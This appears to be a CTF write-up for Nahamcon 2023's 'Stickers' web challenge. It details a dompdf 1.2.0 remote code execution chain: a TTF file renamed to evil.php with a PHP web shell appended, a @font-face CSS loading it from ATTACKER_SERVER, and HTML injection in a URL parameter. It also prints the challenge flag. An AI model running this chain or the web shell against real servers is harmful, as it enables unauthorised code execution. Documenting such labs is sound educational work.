WebsiteDiscord

Stickers

Writeup for Stickers (Web) - Nahamcon CTF (2023) 💜

Video Walkthrough

Description

Wooohoo!!! Stickers!!! Hackers love STICKERS!! You can make your own with our new website! Find the flag file in /flag.txt at the root of the filesystem.

Solution

Tried various payloads in form, but there are some restrictions, e.g. email must be email format, others must be numbers. Successfully inserted {{7 * 7}} as the name, but it just rendered as text.

When we submit, the URL looks like: http://challenge.nahamcon.com:32110/quote.php?organisation=%7B%7B7+*+7%7D%7D&email=a%40a.com&small=1&medium=1&large=1

We get a PDF receipt, containing the information from the URL parameters.

Don't see the request in burp HTTP history, need to change the filter to include binary.

When we do that and scroll through the response, we find the version þÿdompdf 1.2.0.

Google it: https://github.com/positive-security/dompdf-rce

The PoC works, we just need to update URL's, MD5 hash and the payload. However, this article shows the full manual process with a more in depth explanation: https://exploit-notes.hdks.org/exploit/web/dompdf-rce

Copy a true type font to php file.

find / -name "*.ttf" 2>/dev/null
cp /path/to/example.ttf ./evil.php

Add a shell at the bottom of the file.

<?php system($_REQUEST["cmd"]); ?>

Create a malicious CSS, the info in here is important for accessing the uploaded PHP file, i.e. /dompdf/lib/fonts/<font_name>_<font_weight/style>_<md5>.php.

@font-face {
    font-family: "evil";
    src: url("http://ATTACKER_SERVER/evil.php");
    font-weight: "normal";
    font-style: "normal";
}

Create a python web server and expose using ngrok.

sudo python -m http.server 80
ngrok http 80

Make a request containing the malicious stylesheet.

http://challenge.nahamcon.com:32110/quote.php?organisation=<link rel=stylesheet href='http://ATTACKER_SERVER/exploit.css'>&email=a%40a.com&small=1&medium=1&large=1

Calculate the MD5 of the malicious PHP URL.

echo -n http://ATTACKER_SERVER/evil.php | md5sum

b8e6174c9d5ee52c9b35647ffbd20856

Access the URL: http://challenge.nahamcon.com:32110/dompdf/lib/fonts/evil_normal_b8e6174c9d5ee52c9b35647ffbd20856.php?cmd=ls

Works! We can now call cat /flag.txt and receive the flag.

Flag: flag{a4d52beabcfdeb6ba79fc08709bb5508}

PreviousStar WarsNextAngstrom

Last updated